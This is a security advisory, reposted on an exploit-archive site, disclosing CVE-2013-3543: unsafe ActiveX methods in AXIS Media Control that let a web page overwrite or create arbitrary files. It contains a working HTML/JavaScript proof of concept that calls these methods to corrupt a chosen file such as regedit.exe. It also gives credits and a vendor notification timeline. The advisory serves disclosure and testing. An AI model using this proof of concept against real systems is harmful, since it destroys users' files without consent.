首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method
来源:vfocus.net 作者:Javier 发布时间:2013-06-14  
========================================================================
AXIS
====================================================================
========================================================================

1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
A vulnerability has been found in this devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618)

3.Affected Products
CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected
The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012)

4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.”
Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.
The vulnerability exists due to the ActiveX control including insecure "StartRecord()",  "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. 
This can be exploited to corrupt or create arbitrary files in the context of the current user.
In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods:
 
When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage:
 
The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
    <head>
        <title></title>
        <script language="javaScript" type="text/javascript">
            function startRecord(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              MyActiveX.StartRecord(theFile);
            }
            function saveCurrentImage(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFormat = 1;
              MyActiveX.SaveCurrentImage(theFormat, theFile);
            }
            function startRecordMedia(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFlags = 1;
              var theMediaTypes  = "default"
              MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
            }
        </script>
    </head>
    <body>
    <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
    <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
    <param name="MediaType" value="mjpeg">
    <param name="Volume" value="1">
    <param name="ShowStatusBar" value="1">
    <param name="ShowToolbar" value="1">
    <param name="AutoStart" value="1">
    <param name="UIMode" value="ptz-relative">
    <param name="MediaType" value="mjpeg-unicast">
    <param name="StretchToFit" value="0">
    < param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi> 
    </object>
    <br>
    <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
    <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
    <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
    </body>
</html>
_____________________________________________________________________________

5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.

6.Report Timeline
-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability
-2013-05-24: Axis team asks for a report with technical information. 
-2013-05-26: Technical details sent to Axis. 
-2013-05-27: Axis team reports to the technical support to analyze the vulnerability.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ubiquiti airCam RTSP Service 1
·MS13-009 Microsoft Internet Ex
·Syslog Server 1.2.3 - Crash Po
·Easy LAN Folder Share Version
·Sami FTP Server 2.0.1 - RETR D
·Adrenalin Player 2.2.5.3 (.wax
·Linux kernel perf_swevent_init
·Winamp 5.12 (.m3u) - Stack Bas
·WinRadius 2.11 - Denial of Ser
·Solaris 10 Patch Cluster File
·Cisco ASA < 8.4.4.68.2.5.32 Et
·MoinMoin twikidraw Action Trav
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved